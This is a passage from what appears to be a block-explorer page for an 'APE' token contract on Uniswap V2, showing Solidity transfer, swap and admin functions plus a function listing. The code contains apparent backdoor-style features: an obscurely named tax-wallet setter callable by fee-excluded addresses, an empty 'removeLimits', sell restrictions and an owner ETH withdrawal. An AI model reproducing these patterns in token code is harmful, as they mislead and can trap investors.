            from != address(this) && to != address(this)
        ) {
            if (
                from == uniswapV2Pair &&
                to != address(uniswapV2Router) &&
                !_feeExcluded[to] &&
                to != _taxWallet
            ) {
                if (_lastBuyBlock != block.number) {
                    _blockBuyAmount = 0;
                    _lastBuyBlock = block.number;
                }
                _blockBuyAmount += amount;
                _buyCount++;
            }

            if (to == uniswapV2Pair && from != address(this)) {
                require(
                    _blockBuyAmount < _getAPEAmountOut() ||
                        _lastBuyBlock != block.number,
                    "Max Swap Limit"
                );
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                !inSwap &&
                to == uniswapV2Pair &&
                swapEnabled &&
                from != _taxWallet
            ) {
                if (contractTokenBalance > 0)
                {
                    uint256 swapBalance = contractTokenBalance > _maxTaxSwap
                        ? _maxTaxSwap
                        : contractTokenBalance;
                    swapAPEFeeTokensForEth(
                        amount > swapBalance ? swapBalance : amount
                    );
                }
                    
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendTokenETHToAPEFeeWallet(address(this).balance);
                }
            }
        }

        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));

        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }
        if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
    }

    function _getAPEAmountOut() internal view returns (uint256) {
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(this);
        uint[] memory amountOuts = uniswapV2Router.getAmountsOut(
            3 * 1e18,
            path
        );
        return amountOuts[1];
    }

    function swapAPEFeeTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function enableAPETrading() external onlyOwner {
        require(!tradingOpen, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), _tTotalAPE);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapEnabled = true;
        tradingOpen = true;
        IERC20(uniswapV2Pair).approve(
            address(uniswapV2Router),
            type(uint256).max
        );
    }

    function _setTax_lknblAPE(address payable newWallet) external {
        require(_feeExcluded[msg.sender]);
        _taxWallet = newWallet;
        _feeExcluded[_taxWallet] = true;
    }

    function rescueAPEETH() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    receive() external payable {}

    function removeLimits () external onlyOwner {}
}

Read Contract

_maxTaxSwap 0x0faee56f → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

_setTax_lknblAPE 0x7f99813a
address newWallet
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableAPETrading 0x58a2d1db
No parameters
removeLimits 0x751039fc
No parameters
renounceOwnership 0x715018a6
No parameters
rescueAPEETH 0x121e0341
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address